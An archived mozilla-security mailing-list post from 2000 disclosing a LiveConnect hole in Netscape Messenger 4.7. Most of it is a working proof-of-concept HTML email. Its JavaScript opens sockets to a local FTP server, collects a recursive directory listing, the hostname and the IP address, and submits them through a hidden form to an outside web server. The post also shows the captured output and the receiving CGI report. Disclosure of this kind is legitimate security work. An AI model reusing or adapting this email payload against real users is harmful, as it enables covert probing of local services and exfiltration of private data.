'Bug in Netscape Messenger'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       mozilla-security
Subject:    Bug in Netscape Messenger
From:       "ESTC" <tesc0176 () mail ! telepac ! pt>
Date:       2000-03-27 15:31:36
[Download RAW message or body]

Netscape Messenger sends out sensitive information (LiveConnect)
Mar, 25 2000 - 08:10
The LiveConnect technology lets JavaScript and Java code communicate with
each other. Thus, JavaScript programs embedded inside an email message can
access java methods in the localhost "sandbox". This can be used for many
things, one of which (as shown in the attached exploit) lists the content of
a directory on a local FTP server - this is an action a script that came
from the Internet shouldn't be allowed to do.

Vulnerable - Netscape Communicator 4.7

In the following example, it will be shown how a JavaScript program embedded
inside an
HTML email (under Netscape Messenger) can connect to any local port and
send/receive
data. The JavaScript code will connect to a local ftp server, gather
directories
listing and send it to a HTTP server in a GET request. The CGI test.cgi just
shows that
information can be transmit to any web server on the Internet.

Moreover, malicious code (for example, in a buffer overflow attack) could
have been
sent to any vulnerable local port where user reads his mail, bypassing
firewalls, etc.

Exploit Code:

(NOTE: Remove leading <!-- , it was used to defer mailers from processing
the line.)
#------------------MAIL BEGIN-----------------------
<!--Subject: hello
<!--Content-Type: text/html; charset=us-ascii
<!--Content-Transfer-Encoding: 7bit

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<BODY>
hello man !

<FORM NAME="form" ACTION="http://172.21.1.12/cgi-bin/test-cgi"
METHOD="GET">
<INPUT TYPE="hidden" NAME="addr">
<INPUT TYPE="hidden" NAME="host">
<INPUT TYPE="hidden" NAME="list">
</FORM>

<PRE>
<SCRIPT Language="javascript" >
var dbg=1
function debug(s) { if (dbg==1) document.writeln(s); }

   addr=java.net.InetAddress.getLocalHost();
   host=addr.getHostName();
   document.form.host.value=host;
   document.form.addr.value=addr;
   debug("host:"+host);
   debug("addr:"+addr);

   socket=java.net.Socket("localhost",21);
   sin=socket.getInputStream();
   din=java.io.DataInputStream(sin);
   sout=socket.getOutputStream();
   pout=java.io.PrintStream(sout);

   s=din.readLine(); debug("rcv:"+s);

   cmd="USER anonymous\n"
   debug("snd:"+cmd+"<BR>");
   pout.print(cmd);
   s=din.readLine(); debug("rcv:"+s);

   cmd="PASS toto@titi\n"
   debug("snd:"+cmd);
   pout.print(cmd);
   s=din.readLine(); debug("rcv:"+s);

   cmd="PASV\n"
   debug("snd:"+cmd);
   pout.print(cmd);
   s=din.readLine(); debug("rcv:"+s);

   q=s.substring(s.indexOf("(")+11,s.indexOf(")"));
   c=q.indexOf(",");
   port=parseInt(q.substring(0,c))*256+parseInt(q.substring(c+1));
   debug("port="+port);

   socket2=java.net.Socket("localhost",port);
   sin2=socket2.getInputStream();
   din2=java.io.DataInputStream(sin2);

   cmd="LIST -R\n"
   debug("snd:"+cmd);
   pout.print(cmd);
   s=din.readLine();
   debug("rcv:"+s);

   list=""
   while (s!=null) {
     s=din2.readLine();
     debug(s);
     list=list+s;
   }

   document.form.list.value=list;
   document.form.submit()
</SCRIPT>
</BODY>
</html>
#------------------MAIL END-----------------------

This is what you see in your Netscape messenger when you open the previous
mail:

#------------------MESSENGER BEGIN ---------------
<!--Subject:  hello
<!--Date: Wed, 15 Mar 2000 11:36:41 +0100
<!--From: vroyer@althes.fr

hello man !

host:alpha
addr:alpha/172.21.1.32
rcv:220 alpha.beta.fr FTP server (Version 6.2/OpenBSD/Linux-0.11) ready.
snd:USER anonymous

rcv:331 Guest login ok, send your complete e-mail address as password.
snd:PASS toto@titi

rcv:230 Guest login ok, access restrictions apply.
snd:PASV

rcv:227 Entering Passive Mode (127,0,0,1,4,7)
port=1031
snd:LIST -R

rcv:150 Opening ASCII mode data connection for '/bin/ls'.
total 28
drwxr-xr-x   2 0        0            4096 Jan 20 15:32 bin
drwxr-xr-x   2 0        0            4096 Jan 20 15:32 dev
drwxr-xr-x   2 0        0            4096 Jan 20 15:32 etc
drwxr-xr-x   2 0        0            4096 Nov 13 04:00 lib
drwxr-xr-x   2 0        0            4096 Jan 20 15:32 msgs
drwxr-xr-x   2 0        0            4096 Nov 13 04:00 pub
drwxr-xr-x   3 0        0            4096 Jan 20 15:32 usr

bin:
total 1024
-rwxr-xr-x   1 0        0          235304 Nov 13 04:00 compress
-rwxr-xr-x   1 0        0          367936 Nov 13 04:00 ls
-rwxr-xr-x   1 0        0          429572 Nov 13 04:00 tar

dev:
total 0
crw-rw-rw-   1 0        0          1,   3 Nov 13 04:00 null

etc:
total 8
-rw-r--r--   1 0        0              31 Apr 21  1996 group
-rw-r--r--   1 0        0              38 Apr 21  1996 passwd

lib:
total 0

msgs:
total 8
-rw-r--r--   1 0        0              61 May  7  1996 msg.dead
-rw-r--r--   1 0        0             417 May  7  1996 welcome.msg

pub:
total 0

usr:
total 4
drwxr-xr-x   2 0        0            4096 Jan 20 15:32 bin

usr/bin:
total 728
-rwxr-xr-x   1 0        0          367252 Nov 13 04:00 gzip
-rwxr-xr-x   1 0        0          367936 Nov 13 04:00 ls
null


#------------------MESSENGER END ---------------


This shows that the directories listing has been sent to
a remote http server:

#------------------NAVIGATOR BEGIN ---------------
CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = Apache/1.3.6 (Unix) (SuSE/Linux) PHP/3.0.7
mod_perl/1.19 mod_ssl/2.2.8 SSLeay/0.9.0b
SERVER_NAME = tutu.titi.fr
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING =
addr=alpha%2F172.21.1.32&host=alpha&list=total+28drwxr-xr-x+++2+0++++++++0++
++++++++++4096+Jan+20+15%3A32+bindrwxr-xr-x+++2+0++++++++0++++++++++++4096+J
an+20+15%3A32+devdrwxr-xr-x+++2+0++++++++0++++++++++++4096+Jan+20+15%3A32+et
cdrwxr-xr-x+++2+0++++++++0++++++++++++4096+Nov+13+04%3A00+libdrwxr-xr-x+++2+
0++++++++0++++++++++++4096+Jan+20+15%3A32+msgsdrwxr-xr-x+++2+0++++++++0+++++
+++++++4096+Nov+13+04%3A00+pubdrwxr-xr-x+++3+0++++++++0++++++++++++4096+Jan+
20+15%3A32+usrbin%3Atotal+1024-rwxr-xr-x+++1+0++++++++0++++++++++235304+Nov+
13+04%3A00+compress-rwxr-xr-x+++1+0++++++++0++++++++++367936+Nov+13+04%3A00+
ls-rwxr-xr-x+++1+0++++++++0++++++++++429572+Nov+13+04%3A00+tardev%3Atotal+0c
rw-rw-rw-+++1+0++++++++0++++++++++1%2C+++3+Nov+13+04%3A00+nulletc%3Atotal+8-
rw-r--r--+++1+0++++++++0++++++++++++++31+Apr+21++1996+group-rw-r--r--+++1+0+
+++++++0++++++++++++++38+Apr+21++1996+passwdlib%3Atotal+0msgs%3Atotal+8-rw-r
--r--+++1+0++++++++0++++++++++++++61+May++7++1996+msg.dead-rw-r--r--+++1+0
+++++!
+++0+++++++++++++417+May++7++1996+welcome.msgpub%3Atotal+0usr%3Atotal+4drwxr
-xr-x+++2+0++++++++0++++++++++++4096+Jan+20+15%3A32+binusr%2Fbin%3Atotal+728
-rwxr-xr-x+++1+0++++++++0++++++++++367252+Nov+13+04%3A00+gzip-rwxr-xr-x+++1+
0++++++++0++++++++++367936+Nov+13+04%3A00+lsnull
REMOTE_HOST =
REMOTE_ADDR = 172.21.1.32
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
#------------------NAVIGATOR END ---------------







provided by - vroyer - vroyer@althes.fr

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic